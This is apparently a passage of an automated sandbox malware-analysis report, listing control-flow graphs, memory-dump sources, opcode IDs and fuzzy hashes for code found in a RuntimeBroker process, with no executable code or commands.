                                                    • Instruction Fuzzy Hash: 7C91C997B0D9D26BE621B3BD68B61FE3F84DF8323974841B7D1CCD9093DC08645A8295

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 27 7ffd34770670-7ffd34771313 call 7ffd347707c0 55 7ffd34771318-7ffd34771330 27->55 56 7ffd34771331 55->56 56->56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^2$O_^;$O_^D
                                                    • API String ID: 0-1588794792
                                                    • Opcode ID: fb64f9719a1c969cb48e8da406db2d600f7184f515a988992424db6fa93f7648
                                                    • Instruction ID: 6d94760af954cb65a61be1889f0f49a8951a842681782254ef9d52034af90c36
                                                    • Opcode Fuzzy Hash: fb64f9719a1c969cb48e8da406db2d600f7184f515a988992424db6fa93f7648
                                                    • Instruction Fuzzy Hash: 1C41B9A3A0D6C55FE761E67C58BA1FA3FC4DF5322874800FAC08DDA183EC4864569386

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 73 7ffd34770600-7ffd347783c2 81 7ffd34778601-7ffd34778642 call 7ffd34777840 73->81 82 7ffd347783c8-7ffd3477844e 73->82 90 7ffd34778644-7ffd34778655 81->90 91 7ffd34778657-7ffd34778660 81->91 105 7ffd3477844f-7ffd3477846d 82->105 94 7ffd34778668-7ffd34778684 90->94 91->94 100 7ffd34778699-7ffd3477869e 94->100 101 7ffd34778686-7ffd34778697 94->101 104 7ffd347786a5-7ffd3477870b call 7ffd34777850 call 7ffd34777860 100->104 101->104 126 7ffd34778792 104->126 127 7ffd34778711-7ffd3477875d 104->127 113 7ffd34778533 105->113 114 7ffd34778473-7ffd347784ad 105->114 116 7ffd34778538-7ffd3477855f 113->116 114->105 122 7ffd347784af-7ffd34778520 114->122 136 7ffd34778561-7ffd3477856f 116->136 122->113 159 7ffd34778522-7ffd3477852d 122->159 131 7ffd34778797-7ffd347787bf 126->131 127->126 153 7ffd3477875f-7ffd3477878b 127->153 154 7ffd347787c1-7ffd347787d8 call 7ffd34778b55 131->154 141 7ffd34778571-7ffd3477858b 136->141 142 7ffd347785e5-7ffd347785fc 136->142 150 7ffd34778591-7ffd347785ac 141->150 151 7ffd347787d9-7ffd347787ea 141->151 142->151 156 7ffd347785b4-7ffd347785c5 150->156 162 7ffd34778b11-7ffd34778b24 151->162 163 7ffd347787f0-7ffd347788de call 7ffd34777870 call 7ffd34777880 151->163 153->131 161 7ffd3477878d-7ffd34778790 153->161 154->151 168 7ffd347785cc-7ffd347785de 156->168 169 7ffd347785c7 156->169 159->116 164 7ffd3477852f-7ffd34778531 159->164 161->154 163->113 186 7ffd347788e4-7ffd347788fe 163->186 164->136 168->150 173 7ffd347785e0 168->173 169->151 173->151 187 7ffd34778904-7ffd34778964 call 7ffd34777830 call 7ffd34770628 186->187
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,
                                                    • API String ID: 0-3772416878
                                                    • Opcode ID: f82289c6b82892f114bd39858939fad171493d3a6d8bd266d4e184ae876146b9
                                                    • Instruction ID: e25488a1ffa20ebb05ec3724d82cae318552f2d39864055c33000a0fccc08c1f
                                                    • Opcode Fuzzy Hash: f82289c6b82892f114bd39858939fad171493d3a6d8bd266d4e184ae876146b9
                                                    • Instruction Fuzzy Hash: 8712C471B1890A8FEB98EB6CC4A56B977E2FF99300F544579D14EC3292DE78B8418780

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 567 7ffd347759a6-7ffd347759b3 568 7ffd347759be-7ffd34775a87 567->568 569 7ffd347759b5-7ffd347759bd 567->569 573 7ffd34775af3 568->573 574 7ffd34775a89-7ffd34775a92 568->574 569->568 575 7ffd34775af5-7ffd34775b1a 573->575 574->573 576 7ffd34775a94-7ffd34775aa0 574->576 582 7ffd34775b1c-7ffd34775b25 575->582 583 7ffd34775b86 575->583 577 7ffd34775aa2-7ffd34775ab4 576->577 578 7ffd34775ad9-7ffd34775af1 576->578 580 7ffd34775ab8-7ffd34775acb 577->580 581 7ffd34775ab6 577->581 578->575 580->580 584 7ffd34775acd-7ffd34775ad5 580->584 581->580 582->583 585 7ffd34775b27-7ffd34775b33 582->585 586 7ffd34775b88-7ffd34775c30 583->586 584->578 587 7ffd34775b6c-7ffd34775b84 585->587 588 7ffd34775b35-7ffd34775b47 585->588 597 7ffd34775c32-7ffd34775c3c 586->597 598 7ffd34775c9e 586->598 587->586 589 7ffd34775b4b-7ffd34775b5e 588->589 590 7ffd34775b49 588->590 589->589 592 7ffd34775b60-7ffd34775b68 589->592 590->589 592->587 597->598 599 7ffd34775c3e-7ffd34775c4b 597->599 600 7ffd34775ca0-7ffd34775cc9 598->600 601 7ffd34775c84-7ffd34775c9c 599->601 602 7ffd34775c4d-7ffd34775c5f 599->602 607 7ffd34775d33 600->607 608 7ffd34775ccb-7ffd34775cd6 600->608 601->600 603 7ffd34775c63-7ffd34775c76 602->603 604 7ffd34775c61 602->604 603->603 606 7ffd34775c78-7ffd34775c80 603->606 604->603 606->601 610 7ffd34775d35-7ffd34775dc6 607->610 608->607 609 7ffd34775cd8-7ffd34775ce6 608->609 611 7ffd34775d1f-7ffd34775d31 609->611 612 7ffd34775ce8-7ffd34775cfa 609->612 618 7ffd34775dcc-7ffd34775ddb 610->618 611->610 613 7ffd34775cfe-7ffd34775d11 612->613 614 7ffd34775cfc 612->614 613->613 616 7ffd34775d13-7ffd34775d1b 613->616 614->613 616->611 619 7ffd34775de3-7ffd34775e48 call 7ffd34775e64 618->619 620 7ffd34775ddd 618->620 627 7ffd34775e4f-7ffd34775e63 619->627 628 7ffd34775e4a 619->628 620->619 628->627
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a8ec1cff9bf08303fb5973fa625f122e9d36cddd9da7d3ec1af747c6370b6e5
                                                    • Instruction ID: c9560f1cd32ee9875110fbf4fc6a3f90df500b93ed09faf2df21b8072d2330ee
                                                    • Opcode Fuzzy Hash: 2a8ec1cff9bf08303fb5973fa625f122e9d36cddd9da7d3ec1af747c6370b6e5
                                                    • Instruction Fuzzy Hash: C9F1A670608A4E8FEBA8DF28C8957F93BD1FF55310F44826EE84DC7691CB78A9458781

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 629 7ffd34776752-7ffd3477675f 630 7ffd34776761-7ffd34776769 629->630 631 7ffd3477676a-7ffd34776837 629->631 630->631 635 7ffd347768a3 631->635 636 7ffd34776839-7ffd34776842 631->636 637 7ffd347768a5-7ffd347768ca 635->637 636->635 638 7ffd34776844-7ffd34776850 636->638 644 7ffd347768cc-7ffd347768d5 637->644 645 7ffd34776936 637->645 639 7ffd34776852-7ffd34776864 638->639 640 7ffd34776889-7ffd347768a1 638->640 642 7ffd34776868-7ffd3477687b 639->642 643 7ffd34776866 639->643 640->637 642->642 646 7ffd3477687d-7ffd34776885 642->646 643->642 644->645 647 7ffd347768d7-7ffd347768e3 644->647 648 7ffd34776938-7ffd3477695d 645->648 646->640 649 7ffd3477691c-7ffd34776934 647->649 650 7ffd347768e5-7ffd347768f7 647->650 655 7ffd3477695f-7ffd34776969 648->655 656 7ffd347769cb 648->656 649->648 651 7ffd347768fb-7ffd3477690e 650->651 652 7ffd347768f9 650->652 651->651 654 7ffd34776910-7ffd34776918 651->654 652->651 654->649 655->656 658 7ffd3477696b-7ffd34776978 655->658 657 7ffd347769cd-7ffd347769fb 656->657 665 7ffd347769fd-7ffd34776a08 657->665 666 7ffd34776a6b 657->666 659 7ffd347769b1-7ffd347769c9 658->659 660 7ffd3477697a-7ffd3477698c 658->660 659->657 661 7ffd34776990-7ffd347769a3 660->661 662 7ffd3477698e 660->662 661->661 664 7ffd347769a5-7ffd347769ad 661->664 662->661 664->659 665->666 668 7ffd34776a0a-7ffd34776a18 665->668 667 7ffd34776a6d-7ffd34776b45 666->667 678 7ffd34776b4b-7ffd34776b5a 667->678 669 7ffd34776a51-7ffd34776a69 668->669 670 7ffd34776a1a-7ffd34776a2c 668->670 669->667 672 7ffd34776a30-7ffd34776a43 670->672 673 7ffd34776a2e 670->673 672->672 675 7ffd34776a45-7ffd34776a4d 672->675 673->672 675->669 679 7ffd34776b62-7ffd34776bc4 call 7ffd34776be0 678->679 680 7ffd34776b5c 678->680 687 7ffd34776bcb-7ffd34776bdf 679->687 688 7ffd34776bc6 679->688 680->679 688->687
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c4d0a39d88d4b33a67576dc10f5039de6ccc6f89f709158c367ae3a58dff8ae2
                                                    • Instruction ID: 45a5b68ee2545f534ef61581bdb4778f0b129bd9361b3d7d9daae22277c7f372
                                                    • Opcode Fuzzy Hash: c4d0a39d88d4b33a67576dc10f5039de6ccc6f89f709158c367ae3a58dff8ae2
                                                    • Instruction Fuzzy Hash: B1E1B470A08A4D8FEBA8DF28C8657F97BD1EF55310F54826ED84DC7295CE78A8448BC1

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 195 7ffd34777fbd-7ffd34777fc9 196 7ffd34777fd4-7ffd34777fe3 195->196 197 7ffd34777fcb-7ffd34777fd3 195->197 198 7ffd34777fee-7ffd34777ff9 196->198 199 7ffd34777fe5-7ffd34777fed 196->199 197->196 200 7ffd34777ffb-7ffd34778079 198->200 201 7ffd3477807a-7ffd347780a9 VirtualProtect 198->201 199->198 200->201 203 7ffd347780b1-7ffd347780d9 201->203 204 7ffd347780ab 201->204 204->203
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 1939c90f3a6584f3f0e783bc4029d80350b73912bd0555d94d493c719f45791d
                                                    • Instruction ID: 7cfd5671d958888a829ad94fcd1dccbda59c3ba18dd41148b580c94c7d876a80
                                                    • Opcode Fuzzy Hash: 1939c90f3a6584f3f0e783bc4029d80350b73912bd0555d94d493c719f45791d
                                                    • Instruction Fuzzy Hash: 8B41E73190C7888FDB199B689C566EDBFE0EF97321F0442AFD049D3192CA786816C792